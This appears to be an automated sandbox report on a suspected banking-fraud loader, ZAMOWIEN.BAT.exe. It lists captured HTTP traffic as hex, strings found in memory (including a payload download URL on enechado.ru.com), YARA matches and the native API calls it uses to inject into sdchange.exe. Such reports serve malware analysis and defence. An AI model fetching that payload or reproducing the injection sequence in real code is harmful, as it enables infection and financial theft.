          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 11:01:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 11:01:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 39 34 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33485246567.000000000768B000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33540907483.000000000768D000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33484954124.000000000768B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/
          Source: ZAMOWIEN.BAT.exe, 00000002.00000002.33592322896.0000000007667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/cF
          Source: ZAMOWIEN.BAT.exe, 00000002.00000002.33592719351.00000000078F0000.00000004.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000002.33592322896.0000000007667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/pol.bin
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: ZAMOWIEN.BAT.exe, 00000000.00000000.32164172113.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ZAMOWIEN.BAT.exe, 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000000.33317382851.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000626000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377134E0 NtCreateMutant,LdrInitializeThunk,2_2_377134E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_37712EB0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_37712D10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_37712BC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_37712B90
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712A80 NtClose,LdrInitializeThunk,2_2_37712A80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37713C30 NtOpenProcessToken,2_2_37713C30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37713C90 NtOpenThread,2_2_37713C90
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377138D0 NtGetContextThread,2_2_377138D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37714570 NtSuspendThread,2_2_37714570
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37714260 NtSetContextThread,2_2_37714260
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712F30 NtOpenDirectoryObject,2_2_37712F30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712F00 NtCreateFile,2_2_37712F00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712FB0 NtSetValueKey,2_2_37712FB0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712E50 NtCreateSection,2_2_37712E50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712E00 NtQueueApcThread,2_2_37712E00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712ED0 NtResumeThread,2_2_37712ED0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712EC0 NtQuerySection,2_2_37712EC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712E80 NtCreateProcessEx,2_2_37712E80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712D50 NtWriteVirtualMemory,2_2_37712D50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712DC0 NtAdjustPrivilegesToken,2_2_37712DC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712DA0 NtReadVirtualMemory,2_2_37712DA0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712C50 NtUnmapViewOfSection,2_2_37712C50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712C30 NtMapViewOfSection,2_2_37712C30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712C20 NtSetInformationFile,2_2_37712C20
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712C10 NtOpenProcess,2_2_37712C10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712CF0 NtDelayExecution,2_2_37712CF0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712CD0 NtEnumerateKey,2_2_37712CD0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712B20 NtQueryInformationProcess,2_2_37712B20
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712B10 NtAllocateVirtualMemory,2_2_37712B10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712B00 NtQueryValueKey,2_2_37712B00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712BE0 NtQueryVirtualMemory,2_2_37712BE0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712B80 NtCreateKey,2_2_37712B80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712A10 NtWriteFile,2_2_37712A10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712AC0 NtEnumerateValueKey,2_2_37712AC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37712AA0 NtQueryInformationFile,2_2_37712AA0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377129F0 NtReadFile,2_2_377129F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377129D0 NtWaitForSingleObject,2_2_377129D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373E3659 NtSetContextThread,2_2_373E3659
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373E3C99 NtResumeThread,2_2_373E3C99
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373E397A NtSuspendThread,2_2_373E397A
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_043C2C30
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2CF0 NtDelayExecution,LdrInitializeThunk,4_2_043C2CF0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_043C2D10
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2E50 NtCreateSection,LdrInitializeThunk,4_2_043C2E50
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2F00 NtCreateFile,LdrInitializeThunk,4_2_043C2F00
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C29F0 NtReadFile,LdrInitializeThunk,4_2_043C29F0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2A10 NtWriteFile,LdrInitializeThunk,4_2_043C2A10
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2A80 NtClose,LdrInitializeThunk,4_2_043C2A80
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_043C2AC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_043C2B10
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2B00 NtQueryValueKey,LdrInitializeThunk,4_2_043C2B00
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_043C2B90
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2B80 NtCreateKey,LdrInitializeThunk,4_2_043C2B80
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_043C2BC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C34E0 NtCreateMutant,LdrInitializeThunk,4_2_043C34E0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C4570 NtSuspendThread,4_2_043C4570
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C4260 NtSetContextThread,4_2_043C4260
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2C20 NtSetInformationFile,4_2_043C2C20
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2C10 NtOpenProcess,4_2_043C2C10
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2C50 NtUnmapViewOfSection,4_2_043C2C50
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2CD0 NtEnumerateKey,4_2_043C2CD0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2D50 NtWriteVirtualMemory,4_2_043C2D50
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2DA0 NtReadVirtualMemory,4_2_043C2DA0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2DC0 NtAdjustPrivilegesToken,4_2_043C2DC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2E00 NtQueueApcThread,4_2_043C2E00
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2EB0 NtProtectVirtualMemory,4_2_043C2EB0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2E80 NtCreateProcessEx,4_2_043C2E80
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2ED0 NtResumeThread,4_2_043C2ED0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2EC0 NtQuerySection,4_2_043C2EC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2F30 NtOpenDirectoryObject,4_2_043C2F30
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2FB0 NtSetValueKey,4_2_043C2FB0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C29D0 NtWaitForSingleObject,4_2_043C29D0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2AA0 NtQueryInformationFile,4_2_043C2AA0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2B20 NtQueryInformationProcess,4_2_043C2B20
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C2BE0 NtQueryVirtualMemory,4_2_043C2BE0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C3C30 NtOpenProcessToken,4_2_043C3C30
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C3C90 NtOpenThread,4_2_043C3C90
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C38D0 NtGetContextThread,4_2_043C38D0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474EFFA NtQueryInformationProcess,NtReadVirtualMemory,4_2_0474EFFA
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474F9B4 NtUnmapViewOfSection,NtClose,4_2_0474F9B4
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04753668 NtSetContextThread,4_2_04753668
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04753CA8 NtResumeThread,4_2_04753CA8
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04753FC8 NtQueueApcThread,4_2_04753FC8
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04753988 NtSuspendThread,4_2_04753988
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
